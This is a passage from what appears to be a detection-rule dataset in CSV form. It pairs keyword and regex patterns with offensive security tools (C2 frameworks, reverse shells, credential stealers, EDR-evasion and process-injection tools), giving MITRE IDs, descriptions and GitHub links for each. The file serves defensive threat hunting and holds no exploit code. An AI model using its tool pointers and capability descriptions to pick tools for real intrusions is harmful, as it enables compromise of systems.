Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*hijackCLSIDpersistence.*",".{0,1000}hijackCLSIDpersistence\..{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*hijackDll*WINMM.dll*",".{0,1000}hijackDll.{0,1000}WINMM\.dll.{0,1000}","offensive_tool_keyword","MockDirUACBypass","Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. 
A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*Hijacked timer queue handle from the target process: *",".{0,1000}Hijacked\stimer\squeue\shandle\sfrom\sthe\starget\sprocess\:\s.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*Hijacked worker factory handle from the target process: *",".{0,1000}Hijacked\sworker\sfactory\shandle\sfrom\sthe\starget\sprocess\:\s.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*Hijacker*",".{0,1000}Hijacker.{0,1000}","offensive_tool_keyword","Hijacker","Hijacker is a Graphical User Interface for the penetration testing tools Aircrack-ng. Airodump-ng. MDK3 and Reaver. It offers a simple and easy UI to use these tools without typing commands in a console and copy&pasting MAC addresses.This application requires an ARM android device with an internal wireless adapter that supports Monitor Mode. A few android devices do. but none of them natively. This means that you will need a custom firmware. Any device that uses the BCM4339 chipset (MSM8974. such as Nexus 5. Xperia Z1/Z2. LG G2. LG G Flex. Samsung Galaxy Note 3) will work with Nexmon (which also supports some other chipsets). 
Devices that use BCM4330 can use bcmon.","T1135 - T1175 - T1179 - T1189 - T1202","TA0002 - TA0007 - TA0043","N/A","N/A","Network Exploitation tools","https://github.com/chrisk44/Hijacker","1","0","N/A","N/A","10","2320","419","2020-08-26T19:01:31Z","2016-11-25T01:39:07Z" "*HijackHunter.csproj*",".{0,1000}HijackHunter\.csproj.{0,1000}","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find linked DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*HijackHunter.exe*",".{0,1000}HijackHunter\.exe.{0,1000}","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find linked DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*Hijack-MultipleKeys -dll *",".{0,1000}Hijack\-MultipleKeys\s\-dll\s.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*hijackProgDirMissingDll*",".{0,1000}hijackProgDirMissingDll.{0,1000}","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find linked DLLs vulnerable to hijacking. 
Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*HInvokeHashGen.cs*",".{0,1000}HInvokeHashGen\.cs.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","199","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" "*hiphp *--url*",".{0,1000}hiphp\s.{0,1000}\-\-url.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*hiphp.hiphplinkextractor*",".{0,1000}hiphp\.hiphplinkextractor.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. 
It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*hiphp.hiphpversion*",".{0,1000}hiphp\.hiphpversion.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*hiphp-0.3.4.deb*",".{0,1000}hiphp\-0\.3\.4\.deb.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*hiphp-0.3.5.deb*",".{0,1000}hiphp\-0\.3\.5\.deb.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. 
By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*hiphp-0.3.6.deb*",".{0,1000}hiphp\-0\.3\.6\.deb.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*hiphp-1.*.*.deb*",".{0,1000}hiphp\-1\..{0,1000}\..{0,1000}\.deb.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. 
It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*hiphp-cli.bat*",".{0,1000}hiphp\-cli\.bat.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*hiphp-desktop.bat*",".{0,1000}hiphp\-desktop\.bat.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*hiphp-termux.sh*",".{0,1000}hiphp\-termux\.sh.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. 
It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*hiphp-tk.bat*",".{0,1000}hiphp\-tk\.bat.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*history_cmd",".{0,1000}history_cmd","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. 
It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","247","72","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "*Hit enter to run shellcode/payload without creating a new thread*",".{0,1000}Hit\senter\sto\srun\sshellcode\/payload\swithout\screating\sa\snew\sthread.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "*Hit Slack API rate limit !!!*",".{0,1000}Hit\sSlack\sAPI\srate\slimit\s!!!.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*HiveJack-Console.exe*",".{0,1000}HiveJack\-Console\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - 
APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1408","219","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*hktalent/scan4all*",".{0,1000}hktalent\/scan4all.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*hktalent/scan4all*",".{0,1000}hktalent\/scan4all.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*hlldz/dazzleUP*",".{0,1000}hlldz\/dazzleUP.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","486","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" "*hlldz/Phant0m*",".{0,1000}hlldz\/Phant0m.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1725","297","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" 
"*hlldz/RefleXXion*",".{0,1000}hlldz\/RefleXXion.{0,1000}","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","478","103","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z" "*hmeobnfnfcmdkdcmlblgagmfpfboieaf*",".{0,1000}hmeobnfnfcmdkdcmlblgagmfpfboieaf.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*hnfanknocfeofbddgcijnmhnfnkdnaad*",".{0,1000}hnfanknocfeofbddgcijnmhnfnkdnaad.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*hoangprod/AndrewSpecial*",".{0,1000}hoangprod\/AndrewSpecial.{0,1000}","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","1","N/A","10","4","381","98","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z" "*Hoaxshell.exe*",".{0,1000}Hoaxshell\.exe.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. 
currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*hoaxshell.py*",".{0,1000}hoaxshell\.py.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*hoaxshell-listener.py*",".{0,1000}hoaxshell\-listener\.py.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*holehe *@gmail.com*",".{0,1000}holehe\s.{0,1000}\@gmail\.com.{0,1000}","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","6663","755","2024-04-10T07:34:29Z","2020-06-25T23:03:02Z" "*holehe.core:main*",".{0,1000}holehe\.core\:main.{0,1000}","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - 
TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","6663","755","2024-04-10T07:34:29Z","2020-06-25T23:03:02Z" "*holehe\holehe*",".{0,1000}holehe\\holehe.{0,1000}","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","6663","755","2024-04-10T07:34:29Z","2020-06-25T23:03:02Z" "*holehe-master.*",".{0,1000}holehe\-master\..{0,1000}","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","1","N/A","6","10","6663","755","2024-04-10T07:34:29Z","2020-06-25T23:03:02Z" "*hollow *.exe *.bin*",".{0,1000}hollow\s.{0,1000}\.exe\s.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state. inject shellcode. 
hijack main thread with APC and execute shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/HOLLOW","1","0","N/A","10","10","257","56","2023-03-08T15:51:19Z","2021-07-21T15:58:18Z" "*hollower.Hollow(*",".{0,1000}hollower\.Hollow\(.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*home/kali/Downloads*",".{0,1000}home\/kali\/Downloads.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage with wsl - example: \system32\wsl.exe -d kali-linux /usr/sbin/adduser???","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Honey hash*",".{0,1000}Honey\shash.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","New-HoneyHash.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Hook installed in mstsc.exe, PID *",".{0,1000}Hook\sinstalled\sin\smstsc\.exe,\sPID\s.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","0","N/A","10","2","154","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z" "*hookedbrowsers.rb*",".{0,1000}hookedbrowsers\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*hook-infection_monkey.exploit.py*",".{0,1000}hook\-infection_monkey\.exploit\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*hook-infection_monkey.network.py*",".{0,1000}hook\-infection_monkey\.network\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*hook-infection_monkey.post_breach.actions.py*",".{0,1000}hook\-infection_monkey\.post_breach\.actions\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*hook-infection_monkey.post_breach.py*",".{0,1000}hook\-infection_monkey\.post_breach\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*hook-infection_monkey.ransomware.py*",".{0,1000}hook\-infection_monkey\.ransomware\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 
